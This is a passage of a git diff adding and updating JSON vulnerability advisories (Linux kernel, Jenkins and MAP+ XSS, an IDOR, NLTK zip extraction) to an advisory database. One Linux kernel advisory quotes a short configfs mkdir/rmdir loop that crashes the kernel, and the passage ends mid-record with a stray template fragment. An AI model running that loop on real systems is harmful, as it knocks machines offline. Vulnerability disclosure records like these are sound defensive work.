"type": "WEB", + "url": "https://vuldb.com/?id.346455" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.752791" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-119" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T17:21:40Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-6xrx-3vj8-2rjc/GHSA-6xrx-3vj8-2rjc.json b/advisories/unreviewed/2026/02/GHSA-6xrx-3vj8-2rjc/GHSA-6xrx-3vj8-2rjc.json new file mode 100644 index 0000000000000..d3013aa26201c --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-6xrx-3vj8-2rjc/GHSA-6xrx-3vj8-2rjc.json @@ -0,0 +1,33 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-6xrx-3vj8-2rjc", + "modified": "2026-02-18T18:30:39Z", + "published": "2026-02-18T18:30:39Z", + "aliases": [ + "CVE-2025-71230" + ], + "details": "In the Linux kernel, the following vulnerability has been resolved:\n\nhfs: ensure sb->s_fs_info is always cleaned up\n\nWhen hfs was converted to the new mount api a bug was introduced by\nchanging the allocation pattern of sb->s_fs_info. If setup_bdev_super()\nfails after a new superblock has been allocated by sget_fc(), but before\nhfs_fill_super() takes ownership of the filesystem-specific s_fs_info\ndata it was leaked.\n\nFix this by freeing sb->s_fs_info in hfs_kill_super().", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-71230" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/399219831514126bc9541e8eadefe02c6fbd9166" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/46c1d56ad321fb024761abd9af61a0cb616cf2f6" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T16:22:29Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-74jq-6q38-p5wf/GHSA-74jq-6q38-p5wf.json b/advisories/unreviewed/2026/02/GHSA-74jq-6q38-p5wf/GHSA-74jq-6q38-p5wf.json index 7b0a56750956f..fe2beee4b60ab 100644 --- a/advisories/unreviewed/2026/02/GHSA-74jq-6q38-p5wf/GHSA-74jq-6q38-p5wf.json +++ b/advisories/unreviewed/2026/02/GHSA-74jq-6q38-p5wf/GHSA-74jq-6q38-p5wf.json @@ -26,6 +26,7 @@ ], "database_specific": { "cwe_ids": [ + "CWE-284", "CWE-288" ], "severity": "HIGH", diff --git a/advisories/unreviewed/2026/02/GHSA-74rw-28vp-8wh9/GHSA-74rw-28vp-8wh9.json b/advisories/unreviewed/2026/02/GHSA-74rw-28vp-8wh9/GHSA-74rw-28vp-8wh9.json index 327b526f1d626..ad4b1df5bf041 100644 --- a/advisories/unreviewed/2026/02/GHSA-74rw-28vp-8wh9/GHSA-74rw-28vp-8wh9.json +++ b/advisories/unreviewed/2026/02/GHSA-74rw-28vp-8wh9/GHSA-74rw-28vp-8wh9.json @@ -1,13 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-74rw-28vp-8wh9", - "modified": "2026-02-06T09:30:28Z", + "modified": "2026-02-18T18:30:23Z", "published": "2026-02-06T09:30:28Z", "aliases": [ "CVE-2026-0521" ], "details": "A reflected cross-site scripting (XSS) vulnerability in the PDF export functionality of the TYDAC AG MAP+ solution allows unauthenticated attackers to craft a malicious URL, that if visited by a victim, will execute arbitrary JavaScript in the victim's context. Such a URL could be delivered through various means, for instance, by sending a link or by tricking victims to visit a page crafted by the attacker.\n\n\n\nThis issue was verified in MAP+: 3.4.0.", "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N" + }, { "type": "CVSS_V4", "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:A/VC:L/VI:H/VA:H/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" diff --git a/advisories/unreviewed/2026/02/GHSA-78xc-39m5-v2c6/GHSA-78xc-39m5-v2c6.json b/advisories/unreviewed/2026/02/GHSA-78xc-39m5-v2c6/GHSA-78xc-39m5-v2c6.json new file mode 100644 index 0000000000000..24d12465b54be --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-78xc-39m5-v2c6/GHSA-78xc-39m5-v2c6.json @@ -0,0 +1,37 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-78xc-39m5-v2c6", + "modified": "2026-02-18T18:30:40Z", + "published": "2026-02-18T18:30:40Z", + "aliases": [ + "CVE-2025-71233" + ], + "details": "In the Linux kernel, the following vulnerability has been resolved:\n\nPCI: endpoint: Avoid creating sub-groups asynchronously\n\nThe asynchronous creation of sub-groups by a delayed work could lead to a\nNULL pointer dereference when the driver directory is removed before the\nwork completes.\n\nThe crash can be easily reproduced with the following commands:\n\n # cd /sys/kernel/config/pci_ep/functions/pci_epf_test\n # for i in {1..20}; do mkdir test && rmdir test; done\n\n BUG: kernel NULL pointer dereference, address: 0000000000000088\n ...\n Call Trace:\n configfs_register_group+0x3d/0x190\n pci_epf_cfs_work+0x41/0x110\n process_one_work+0x18f/0x350\n worker_thread+0x25a/0x3a0\n\nFix this issue by using configfs_add_default_group() API which does not\nhave the deadlock problem as configfs_register_group() and does not require\nthe delayed work handler.\n\n[mani: slightly reworded the description and added stable list]", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-71233" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/24a253c3aa6d9a2cde46158ce9782e023bfbf32d" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/73cee890adafa2c219bb865356e08e7f82423fe5" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/d9af3cf58bb4c8d6dea4166011c780756b1138b5" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T16:22:30Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-7fjm-558r-4j8r/GHSA-7fjm-558r-4j8r.json b/advisories/unreviewed/2026/02/GHSA-7fjm-558r-4j8r/GHSA-7fjm-558r-4j8r.json new file mode 100644 index 0000000000000..bdefd92383ede --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-7fjm-558r-4j8r/GHSA-7fjm-558r-4j8r.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-7fjm-558r-4j8r", + "modified": "2026-02-18T18:30:40Z", + "published": "2026-02-18T18:30:40Z", + "aliases": [ + "CVE-2025-70148" + ], + "details": "Missing authentication and authorization in print_membership_card.php in CodeAstro Membership Management System 1.0 allows unauthenticated attackers to access membership card data of arbitrary users via direct requests with a manipulated id parameter, resulting in insecure direct object reference (IDOR).", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-70148" + }, + { + "type": "WEB", + "url": "https://www.phpscriptsonline.com/product/membership-management-software" + }, + { + "type": "WEB", + "url": "https://youngkevinn.github.io/posts/CVE-2025-70148-Membership-IDOR" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T18:24:19Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-7p94-766c-hgjp/GHSA-7p94-766c-hgjp.json b/advisories/unreviewed/2026/02/GHSA-7p94-766c-hgjp/GHSA-7p94-766c-hgjp.json new file mode 100644 index 0000000000000..a7ca0379d3cc8 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-7p94-766c-hgjp/GHSA-7p94-766c-hgjp.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-7p94-766c-hgjp", + "modified": "2026-02-18T18:30:40Z", + "published": "2026-02-18T18:30:40Z", + "aliases": [ + "CVE-2025-14009" + ], + "details": "A critical vulnerability exists in the NLTK downloader component of nltk/nltk, affecting all versions. The _unzip_iter function in nltk/downloader.py uses zipfile.extractall() without performing path validation or security checks. This allows attackers to craft malicious zip packages that, when downloaded and extracted by NLTK, can execute arbitrary code. The vulnerability arises because NLTK assumes all downloaded packages are trusted and extracts them without validation. If a malicious package contains Python files, such as __init__.py, these files are executed automatically upon import, leading to remote code execution. This issue can result in full system compromise, including file system access, network access, and potential persistence mechanisms.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-14009" + }, + { + "type": "WEB", + "url": "https://huntr.com/bounties/49ecbc02-054e-4470-b2e0-b267936cc4e4" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-94" + ], + "severity": "CRITICAL", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T18:24:19Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-85h6-5m3v-gx37/GHSA-85h6-5m3v-gx37.json b/advisories/unreviewed/2026/02/GHSA-85h6-5m3v-gx37/GHSA-85h6-5m3v-gx37.json index 977856997d094..20e8e93f6cfb1 100644 --- a/advisories/unreviewed/2026/02/GHSA-85h6-5m3v-gx37/GHSA-85h6-5m3v-gx37.json +++ b/advisories/unreviewed/2026/02/GHSA-85h6-5m3v-gx37/GHSA-85h6-5m3v-gx37.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-85h6-5m3v-gx37", - "modified": "2026-02-18T15:31:27Z", + "modified": "2026-02-18T18:30:38Z", "published": "2026-02-18T15:31:27Z", "aliases": [ "CVE-2026-27099" ], "details": "Jenkins 2.483 through 2.550 (both inclusive), LTS 2.492.1 through 2.541.1 (both inclusive) does not escape the user-provided description of the \"Mark temporarily offline\" offline cause, resulting in a stored cross-site scripting (XSS) vulnerability exploitable by attackers with Agent/Configure or Agent/Disconnect permission.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H" + } + ], "affected": [], "references": [ { @@ -20,8 +25,10 @@ } ], "database_specific": { - "cwe_ids": [], - "severity": null, + "cwe_ids": [ + "CWE-79" + ], + "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2026-02-18T15:18:43Z" diff --git a/advisories/unreviewed/2026/02/GHSA-876r-52fj-4pxf/GHSA-876r-52fj-4pxf.json b/advisories/unreviewed/2026/02/GHSA-876r-52fj-4pxf/GHSA-876r-52fj-4pxf.json new file mode 100644 index 0000000000000..2de5576a67e7f --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-876r-52fj-4pxf/GHSA-876r-52fj-4pxf.json @@ -0,0 +1,41 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-876r-52fj-4pxf", + "modified": "2026-02-18T18:30:40Z", + "published": "2026-02-18T18:30:40Z", + "aliases": [ + "CVE-2025-71235" + ], + "details": "In the Linux kernel, the following vulnerability has been resolved:\n\nscsi: qla2xxx: Delay module unload while fabric scan in progress\n\nSystem crash seen during load/unload test in a loop.\n\n[105954.384919] RBP: ffff914589838dc0 R08: 0000000000000000 R09: 0000000000000086\n[105954.384920] R10: 000000000000000f R11: ffffa31240904be5 R12: ffff914605f868e0\n[105954.384921] R13: ffff914605f86910 R14: 0000000000008010 R15: 00000000ddb7c000\n[105954.384923] FS: 0000000000000000(0000) GS:ffff9163fec40000(0000) knlGS:0000000000000000\n[105954.384925] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033\n[105954.384926] CR2: 000055d31ce1d6a0 CR3: 0000000119f5e001 CR4: 0000000000770ee0\n[105954.384928] PKRU: 55555554\n[105954.384929] Call Trace:\n[105954.384931]
\n\n// [...Truncated...]\n@foreach($device_groups as $device_group)\n// [...Truncated...]\n\n